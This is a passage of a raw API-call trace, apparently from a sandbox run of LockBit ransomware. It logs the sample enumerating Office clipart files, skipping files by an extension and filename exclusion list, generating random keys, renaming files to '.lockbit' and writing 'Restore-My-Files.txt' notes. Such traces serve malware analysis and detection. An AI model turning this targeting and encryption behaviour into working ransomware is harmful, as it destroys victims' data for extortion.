[0102.729] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04134_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13b4 [0102.730] CreateIoCompletionPort (FileHandle=0x13b4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0102.730] malloc (_Size=0x40068) returned 0x3e700e8 [0102.731] GetFileSizeEx (in: hFile=0x13b4, lpFileSize=0x3e70100 | out: lpFileSize=0x3e70100*=3416) returned 1 [0102.732] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.732] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.732] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb011c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb011c) returned 0x0 [0103.222] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.223] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.223] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb012c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb012c) returned 0x0 [0103.223] ReadFile (in: hFile=0x13b4, lpBuffer=0x3e7011c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e700e8 | out: lpBuffer=0x3e7011c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e700e8) returned 1 [0103.225] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0103.225] malloc (_Size=0xa6) returned 0x3e70008 [0103.225] NtSetInformationFile (FileHandle=0x13b4, IoStatusBlock=0x3d6b6b4, FileInformation=0x3e70008, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0103.226] free (_Block=0x3e70008) [0103.226] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0103.226] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0103.226] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0103.226] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5eb8e810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xa4c, dwReserved0=0x0, dwReserved1=0x0, cFileName="AN04174_.WMF", cAlternateFileName="")) returned 1 [0103.226] lstrcmpiW (lpString1=".", lpString2="AN04174_.WMF") returned -1 [0103.226] lstrcmpiW (lpString1="..", lpString2="AN04174_.WMF") returned -1 [0103.226] PathFindExtensionW (pszPath="AN04174_.WMF") returned=".WMF" [0103.226] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0103.226] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0103.226] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0103.227] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0103.227] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0103.227] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0103.227] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0103.227] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0103.227] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0103.227] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0103.227] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0103.227] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0103.227] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0103.227] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0103.227] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0103.227] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0103.227] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0103.227] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0103.227] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0103.227] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0103.227] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0103.227] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0103.227] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0103.227] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0103.227] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0103.227] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0103.227] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0103.227] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0103.228] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0103.228] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0103.228] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0103.228] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0103.228] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0103.228] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0103.228] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0103.228] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0103.228] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0103.228] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0103.228] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0103.228] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0103.228] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0103.228] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0103.228] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0103.228] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0103.228] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0103.228] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0103.228] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0103.228] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AN04174_.WMF") returned 1 [0103.228] lstrcmpiW (lpString1="ntldr", lpString2="AN04174_.WMF") returned 1 [0103.228] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AN04174_.WMF") returned 1 [0103.228] lstrcmpiW (lpString1="bootsect.bak", lpString2="AN04174_.WMF") returned 1 [0103.228] lstrcmpiW (lpString1="autorun.inf", lpString2="AN04174_.WMF") returned 1 [0103.228] lstrcmpiW (lpString1="thumbs.db", lpString2="AN04174_.WMF") returned 1 [0103.229] lstrcmpiW (lpString1="iconcache.db", lpString2="AN04174_.WMF") returned 1 [0103.229] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0103.229] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF") returned=".WMF" [0103.229] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0103.229] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0103.229] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0103.229] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0103.229] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0103.229] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0103.229] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0103.229] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0103.229] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0103.229] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0103.229] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0103.229] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0103.229] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0103.229] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0103.229] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0103.229] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0103.229] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0103.229] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0103.229] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0103.229] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0103.229] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0103.230] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0103.230] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0103.230] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0103.230] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0103.230] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0103.230] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0103.230] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0103.230] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF.lockbit") returned 72 [0103.230] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04174_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0103.240] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0103.240] malloc (_Size=0x40068) returned 0x1ff1e60 [0103.240] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=2636) returned 1 [0103.240] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.241] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.241] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0103.241] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.241] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.241] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0103.241] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0103.244] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0103.244] malloc (_Size=0xa6) returned 0x3e70008 [0103.244] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x3e70008, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0103.245] free (_Block=0x3e70008) [0103.245] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0103.245] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0103.245] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0103.245] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5eb8e810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x19ec, dwReserved0=0x0, dwReserved1=0x0, cFileName="AN04191_.WMF", cAlternateFileName="")) returned 1 [0103.245] lstrcmpiW (lpString1=".", lpString2="AN04191_.WMF") returned -1 [0103.245] lstrcmpiW (lpString1="..", lpString2="AN04191_.WMF") returned -1 [0103.245] PathFindExtensionW (pszPath="AN04191_.WMF") returned=".WMF" [0103.245] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0103.245] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0103.245] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0103.245] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0103.245] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0103.245] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0103.245] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0103.246] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0103.246] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0103.246] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0103.246] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0103.246] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0103.246] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0103.246] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0103.246] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0103.246] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0103.246] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0103.246] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0103.246] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0103.246] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0103.246] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0103.246] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0103.246] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0103.246] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0103.246] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0103.246] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0103.246] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0103.246] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0103.246] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0103.247] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0103.247] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0103.247] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0103.247] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0103.247] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0103.247] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0103.247] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0103.247] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0103.247] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0103.247] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0103.247] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0103.247] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0103.247] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0103.247] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0103.247] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0103.247] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0103.247] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0103.247] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0103.247] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AN04191_.WMF") returned 1 [0103.247] lstrcmpiW (lpString1="ntldr", lpString2="AN04191_.WMF") returned 1 [0103.248] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AN04191_.WMF") returned 1 [0103.248] lstrcmpiW (lpString1="bootsect.bak", lpString2="AN04191_.WMF") returned 1 [0103.248] lstrcmpiW (lpString1="autorun.inf", lpString2="AN04191_.WMF") returned 1 [0103.248] lstrcmpiW (lpString1="thumbs.db", lpString2="AN04191_.WMF") returned 1 [0103.248] lstrcmpiW (lpString1="iconcache.db", lpString2="AN04191_.WMF") returned 1 [0103.248] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0103.248] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF") returned=".WMF" [0103.248] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0103.248] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0103.248] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0103.248] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0103.248] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0103.248] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0103.248] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0103.248] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0103.248] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0103.248] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0103.248] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0103.248] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0103.249] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0103.249] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0103.249] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0103.249] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0103.249] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0103.249] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0103.249] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0103.249] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0103.249] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0103.249] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0103.249] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0103.249] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0103.249] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0103.249] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0103.249] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0103.249] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0103.249] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF.lockbit") returned 72 [0103.249] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04191_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c8 [0103.250] CreateIoCompletionPort (FileHandle=0x13c8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0103.250] malloc (_Size=0x40068) returned 0x3d70048 [0103.250] GetFileSizeEx (in: hFile=0x13c8, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=6636) returned 1 [0103.250] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.251] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.251] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0103.251] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.251] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.251] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0103.251] ReadFile (in: hFile=0x13c8, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0103.264] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0103.264] malloc (_Size=0xa6) returned 0x77d800 [0103.264] NtSetInformationFile (FileHandle=0x13c8, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0103.265] free (_Block=0x77d800) [0103.265] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0103.265] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0103.265] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0103.265] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5133d8d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1204, dwReserved0=0x0, dwReserved1=0x0, cFileName="AN04195_.WMF", cAlternateFileName="")) returned 1 [0103.266] lstrcmpiW (lpString1=".", lpString2="AN04195_.WMF") returned -1 [0103.266] lstrcmpiW (lpString1="..", lpString2="AN04195_.WMF") returned -1 [0103.266] PathFindExtensionW (pszPath="AN04195_.WMF") returned=".WMF" [0103.266] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0103.266] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0103.266] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0103.266] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0103.266] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0103.266] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0103.266] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0103.266] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0103.266] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0103.266] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0103.266] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0103.266] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0103.266] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0103.266] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0103.266] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0103.266] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0103.266] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0103.266] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0103.267] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0103.267] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0103.267] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0103.267] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0103.267] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0103.267] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0103.267] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0103.267] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0103.267] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0103.267] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0103.267] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0103.267] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0103.267] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0103.267] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0103.267] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0103.267] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0103.267] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0103.267] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned 